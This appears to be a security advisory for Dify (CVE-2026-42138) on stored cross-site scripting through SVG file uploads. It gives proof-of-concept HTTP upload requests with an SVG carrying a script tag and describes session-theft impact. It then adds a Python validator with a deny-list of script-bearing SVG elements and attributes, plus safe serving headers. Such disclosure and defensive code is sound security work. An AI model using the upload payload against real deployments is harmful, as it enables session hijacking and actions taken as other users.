
Stored XSS via SVG-file upload

Moderate
laipz8200 published GHSA-cg94-8v83-7hjj Apr 20, 2026

Package

Dify

Affected versions

<= 1.9.2

Patched versions

1.13.1

Description

Summary

Using the method POST /api/files/upload, any unauthenticated user can upload an SVG file containing embedded JavaScript, which executes in the browser of anyone who opens the returned source_url (stored XSS).
The method POST /v1/files/upload, which requires authentication through the application API, is vulnerable in the same way.

Details and PoC

  1. Open any chat in your browser in incognito mode.
  2. Upload the file using the following request:
POST /api/files/upload HTTP/2
Host: dify.test
X-App-Passport: <JWT_anon>
Content-Type: multipart/form-data; boundary=----geckoformboundarya5d1bb3810213937e8658e99124e66cb
Content-Length: 597

------geckoformboundarya5d1bb3810213937e8658e99124e66cb
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>
------geckoformboundarya5d1bb3810213937e8658e99124e66cb--
  3. The response will contain a source_url; follow it (you can do this without authentication).

For the method POST /v1/files/upload, exploitation is similar:

  1. Send the following request:
POST /v1/files/upload HTTP/2
Host: dify.test
Authorization: Bearer <app_apikey>
Content-Type: multipart/form-data; boundary=----geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a
Content-Length: 597

------geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>
------geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a--

  2. The response will contain a source_url; follow it (you can do this without authentication).

Impact

Performing actions on behalf of a user; session theft when the access token is stored in Local Storage (or in a cookie without HttpOnly), etc.
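The following is an added example, not Dify's own code: a server-side check that rejects uploaded SVGs carrying active content (script elements, on* event attributes, javascript:/data: hrefs, foreignObject), plus the response headers a file-serving endpoint should send so that following a stored file's URL never executes it in the page origin. The sample inputs are the advisory's PoC SVG and a constructed benign SVG; the function names and the `upload_policy` helper are hypothetical.

```python
"""Defensive handling of SVG uploads (added example, not Dify's code).

Two layers: reject SVGs with executable content at upload time, and serve
stored files with headers that stop inline rendering/script execution even
if a dangerous file slips through.
"""
import xml.etree.ElementTree as ET  # production code should use defusedxml to resist entity-expansion attacks

# Elements that can carry or load executable content when an SVG is rendered directly.
ACTIVE_ELEMENTS = {"script", "handler", "foreignobject", "iframe", "object", "embed"}
# URL schemes that turn an href into code execution or an inline document.
ACTIVE_SCHEMES = ("javascript:", "data:")


def _local(qualified: str) -> str:
    """Strip an XML namespace prefix: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1]


def svg_threats(data: bytes) -> list[str]:
    """Return the reasons an SVG is unsafe to render inline; empty list means none found.

    Fails closed: XML that does not parse is reported as a threat rather than accepted.
    Comparison is case-insensitive as a margin; SVG itself is case-sensitive.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    threats = []
    for elem in root.iter():
        name = _local(elem.tag).lower()
        if name in ACTIVE_ELEMENTS:
            threats.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            attr_name = _local(attr).lower()
            if attr_name.startswith("on"):
                threats.append(f"event handler attribute {attr_name} on <{name}>")
            elif attr_name == "href" and value.strip().lower().startswith(ACTIVE_SCHEMES):
                threats.append(f"active href on <{name}>")
    return threats


def upload_policy(filename: str, content_type: str, data: bytes) -> tuple[bool, list[str]]:
    """Decide whether an upload is accepted; SVGs are judged by content, not just by name.

    Returns (accepted, reasons). Checking both the extension and the declared type
    matters because either one alone can be chosen by the uploader.
    """
    looks_like_svg = filename.lower().endswith(".svg") or content_type == "image/svg+xml"
    if not looks_like_svg:
        return True, []
    reasons = svg_threats(data)
    return (len(reasons) == 0), reasons


def download_headers(content_type: str) -> dict[str, str]:
    """Headers for serving a stored upload (the target of source_url).

    Content-Disposition: attachment makes a direct navigation download the file
    instead of rendering it; the CSP sandbox blocks script if it is rendered anyway;
    nosniff stops the browser from guessing a more dangerous type.
    """
    headers = {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; script-src 'none'",
    }
    if content_type == "image/svg+xml":
        headers["Content-Disposition"] = "attachment"
    return headers


# The advisory's PoC SVG (a <script> element drawing an alert).
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>"""

# Constructed benign SVG: the same triangle with no active content.
BENIGN_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <a xlink:href="https://example.invalid/docs"><text x="5" y="60">docs</text></a>
</svg>"""


if __name__ == "__main__":
    for label, blob in (("PoC", POC_SVG), ("benign", BENIGN_SVG)):
        accepted, reasons = upload_policy("SVG_XSS.svg", "image/svg+xml", blob)
        print(f"{label}: accepted={accepted} reasons={reasons}")
    print(download_headers("image/svg+xml"))
```

The content check is a deny-list and should be treated as the first layer only; the headers in `download_headers` are what make the stored file harmless even when a variant the filter does not recognise gets through, and an image-only use case can go further by re-rasterising SVGs to PNG at upload time.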

Severity

Moderate

CVE ID

CVE-2026-42138

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Credits